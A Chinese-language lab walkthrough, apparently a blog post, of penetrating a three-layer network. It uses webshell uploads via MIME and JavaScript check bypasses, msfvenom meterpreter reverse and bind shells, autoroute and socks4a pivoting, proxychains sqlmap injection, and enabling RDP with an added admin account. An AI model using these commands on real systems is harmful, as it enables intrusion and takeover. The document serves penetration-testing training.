三层网络渗透测试实验
前言
在渗透测试过程中我们会遇到很多不同的网络情况,或许普通的内网渗透我们已经很熟练了,但在现实环境中或许会有多层网络结构,如果遇到多层网络结构我们应该如何进行渗透呢?
利用这个实验我们就可以更清晰的了解多层网络渗透测试的过程。并了解通过msf进行内网渗透,由一级代理到二级代理的搭建来进行对三层网络的渗透的过程。
【三层网络拓扑图】
【第一层主机】
目标ip:192.168.31.207
访问目标ip发现是一个文件上传页面
经测试可通过文件类型MIME绕过进行上传php脚本,上传成功后返回路径
访问返回的文件路径,成功连接到php大马
查看ip发现该主机是双网卡,第二层网络段为192.168.1.0/24
为进一步进行内网渗透,我们上传msf后门
后门制作:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.207 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >shell.elf
将后门上传到第一层主机192.168.31.207
设置msf监听
在第一层主机上运行shell.elf
Chmod 777 shell.elf
./shell.elf
msf获得meterpreter
将第一层的meterpreter切换到后台运行
background
【第二层主机】
利用第一层的meterpreter添加第二层的路由
run autoroute -s 192.168.1.0/24
扫描发现第二层主机ip为192.168.1.100
接着利用msf搭建socks代理,好让攻击机直接打第二层网络:
use auxiliary/server/socks4a
设置好代理后访问192.168.1.100成功访问到网站
利用弱口令admin/admin登录到后台
在设置处发现可修改允许上传文件的类型,修改后保存设置
在撰写新文章处添加附件可直接上传php脚本
成功连接到php大马
为了打开第三层,我们需要在第二层主机上传msf后门
制作后门:
msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=1234 -f elf > ding.elf
利用大马上传,并在第二层主机上运行
chmod 777 ding.elf
./ding.elf
设置msf相关配置
成功获取到第二层主机meterpreter
查看ip发现第三层网段为192.168.2.0/24
利用第二层主机的meterpreter添加第三层的网络路由
启用一个socks4a代理给第三层网络,端口设置为2334
然后在配置文件中加上
socks4 192.168.31.119 2334
利用获得的meterpreter发现第三层目标主机为192.16.2.100
【第三层主机】
使用代理打开Firefox访问第三层主机ip192.168.2.100
通过测试发现http://192.168.2.100/category.php?cat_id=1处存在sql注入
利用proxychains跑一下sqlmap
proxychains sqlmap -u"http://192.168.2.100/category.php?cat_id=1"
成功注出后台账号和加密的密码
发现管理员密码解不开。
利用nmap扫描网站后台路径
proxychains nmap --script http-enum -p80 192.168.2.100
发现有个上传点
测试发现该上传点是前端检测,利用JavaScript绕过即可上传成功
访问/upload/uploads/webshelldama.php
成功连接到php大马
利用大马查看发现是windows2003系统
添加用户账号密码
将添加的用户账号密码添加到管理组
利用大马开启3389端口
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
成功开启3389端口
利用添加的管理员账号密码成功登录到远程桌面
三层网络渗透测试实验相关推荐
- 网络渗透测试实验三 XSS和SQL
网络渗透测试实验三 XSS和SQL注入 实验目的:了解什么是XSS:思考防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计中避免出现SQL注入漏 ...
- 网络渗透测试实验三——XSS和SQL注入
网络渗透测试实验三--XSS和SQL注入 实验目的 了解什么是XSS:了解XSS攻击实施,理解防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计 ...
- 网络渗透测试实验二(网络扫描与网络侦察)
实验目的:理解网络扫描.网络侦察的作用:通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎.扫描工具的应用,通过信息收集为下一步渗透工作打下基础. 系统环境:Kali Linux 2.Windows 网 ...
- 网络渗透测试实验一 网络扫描与网络侦查
实验目的 理解网络扫描.网络侦察的作用:通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎.扫描工具的应用,通过信息收集为下一步渗透工作打下基础. 实验内容.原理 一.被动扫描 1.搜索麻省理工学院网站 ...
- GUET网络渗透测试实验报告1
1.实验目的 理解网络扫描.网络侦察的作用:通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎.扫描工具的应用,通过信息收集为下一步渗透工作打下基础. 2. 实验内容.原理 3. 实验过程 1.用搜索引 ...
- 网络渗透测试实验一 网络扫描与网络侦察
目录 一.实验目的和要求 二.实验步骤 三.实验小结 一.实验目的和要求 实验目的:理解网络扫描.网络侦察的作用:通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎.扫描工具的应用,通过信息收集为下一步 ...
- 网络渗透测试实验——网络扫描与网络侦察
目录 1. 实验目的和要求 2. 实验步骤 3. 实验小结 实验目的和要求 理解网络扫描.网络侦察的作用:通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎.扫描工具的应用,通过信息收集为 ...
- socks4代理网络渗透测试实验
实验目的:利用代理功能对2层网络进行渗透测试靶机 ubantu 192.168.31.207 192.168.1.129ubantu 192.168.1.100 首先访问192.168.31.207 ...
- (超详细)XSS和SQL注入-网络渗透测试实验三
文章目录 前言 实验目的 系统环境 网络环境 实验工具 XSS部分:利用Beef劫持被攻击者客户端浏览器. 实验环境搭建. 环境搭建参考网站 搭建IIS时踩的坑: 1.利用AWVS扫描留言簿网站,发现 ...
最新文章
- Hibernate 关联 set 和 list 对比
- ITK:对多个线程上的数据进行操作以利用多核处理器
- 千万商家的智能决策引擎--AnalyticDB如何助力生意参谋双十一
- css compressor java_利用YUI Compressor压缩JS/CSS之终极秘籍
- 【debug】UnboundLocalError local variable a referenced before assignment
- less入门及基础学习(建议有css基础)
- 曾逼马云道歉,扬言5年超过阿里!3年后市值差了3万亿 !
- 剑指offer——面试题54:表示数值的字符串
- keras系列︱Sequential与Model模型、keras基本结构功能(一)
- 「玻璃鸟不会归来」读后感
- HC74h595 串行输出再进行串口输出(串行通信嵌套)已测试成功。
- 2017 robotart x86_RobotArt:机器人离线编程仿真软件领航者
- 「Python|场景案例」如何获取音视频中声音片段的起止时间?
- uvm 糖果爱好者 subscriber调用parent方法解读
- 为什么要进行系统拆分?
- JAVA面试常见问题200+
- tongyongwangyekuaijiefangshi
- 标准oc算法的推导与99行代码详解
- 全国税收调查数据 (1)涵盖范围 全国税收调查数据收录了与税务相关的年度数据,时间跨度为2007年至2016年。该数据库具体涵盖增值税、增值税出口退税、消费税、营业税、房产税、城镇土地使用税、
- netstat 命令详解及实现原理